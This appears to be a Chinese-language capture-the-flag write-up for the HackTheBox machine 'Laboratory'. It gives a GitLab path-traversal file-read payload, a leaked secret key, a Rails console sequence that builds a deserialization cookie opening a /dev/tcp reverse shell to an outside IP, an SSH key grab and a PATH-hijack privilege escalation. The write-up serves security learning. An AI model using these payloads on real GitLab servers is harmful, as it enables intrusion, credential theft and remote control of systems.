HackTheBox-Laboratory

• Name:Laboratory
• OS:Linux

访问http://laboratory.htb,结果跳转到了https，检查证书可以得到另外一个子域名git.laboratory.htb

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open  ssl/ssl Apache httpd (SSL-only mode)
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Laboratory
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after:  2024-03-03T10:39:28
| tls-alpn:
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

git.laboratory.htb

访问git.laboratory.htb就会发现是个gitlab页面。可以自己注册，但是邮箱后缀必须是laboratory.htb。注册之后随便瞎逛，没什么发现。最后发现git版本。

0x02 漏洞利用

LFI

1. 新建两个project（a和b）

2. 在project a中提交一个issuse

   内容为:![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)

3. 将这个issuse移动到b项目中。

4. 点击链接。

漏洞详情：Arbitrary file read via the UploadsRewriter when moving an issue

RCE

但是如果继续阅读漏洞报告的话，你会发现这个LFI漏洞修改cookies_serializer为hybrid最后会变成一个RCE漏洞

Hackone-Arbitrary file read via the UploadsRewriter when moving and issue

It’s possible to turn this into an RCE as the cookies_serializer is set to :hybrid by default.

The can be done by first grabbing the secret_key_base from /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml using the arbitrary file read and then use the experimentation_subject_id cookie with a Marshalled payload.

A payload can be generated by changing your own gitlab instances secret_key_base to match, then running the following in a rails console

依照着这个LFI的CVE找到了一个exp:gitlab_rce，不过需要进行修改。

self.email_domain = "gmail.htb"
改成
self.email_domain = "laboratory.htb"

也能利用这个脚本来拿到shell，但是是个受限的shell。

这里建议手动利用这个漏洞，我是在本地搭建了gitlab环境来复现。

先利用LFI漏洞先读取secrets.yaml，来获取secret_key_base字段。

![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml)

需要将本地的gitlab的secrets.yaml的secret_key_base字段替换为受害机的。

vim /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml

secret_key_base: 3231f54b33e0c1ce998113c083528460153b19542a70173b4458a21e845ffa33cc45ca7486fc8ebb6b2727cc02feea4c3adbe2cc7b65003510e4031e164137b3

替换好之后，进入到radis console

依次输入以下内容，在获取到cookie之前，这些命令会在本机执行一次，所以在拿到cookie之后再监听端口。

sudo gitlab-rails console

request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_jar
erb = ERB.new("<%= `bash -c 'bash -i >& /dev/tcp/10.10.14.55/7777 0>&1'` %>")
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
cookies.signed[:cookie] = depr
puts cookies[:cookie]

进入到radis console 中重置dextr用户密码

> user = User.where(id: 1).first
=> #<User id: 1, @dexter>
> user.password=12345678
=> 12345678
> user.password_confirmation=12345678
=> 12345678
> user.save!
=> true
> quit

成功登陆到dexter用户

在secure_docker项目中能找到id_rsa，下载下来，修改权限为600.
(最好自己复制下来，然后粘贴)

0x03 提权

进来后，先简单看了下suid位文件，结果。。

目标机器上没有strings。只能用cat看，一个很简单的二进制文件。

有用到chmod，但是没有用绝对路径，所以环境变量提权。

cd /tmp
echo '/usr/bin/bash' >chmod
export PATH=/tmp:$PATH
/usr/local/bin/docker-security

0x04 参考

• Hackone-Arbitrary file read via the UploadsRewriter when moving and issue
• gitlab_rce
• CVE-2020-10977-Gitlab CE/EE 任意文件读取导致远程命令执行漏洞
• gitlab重置root的密码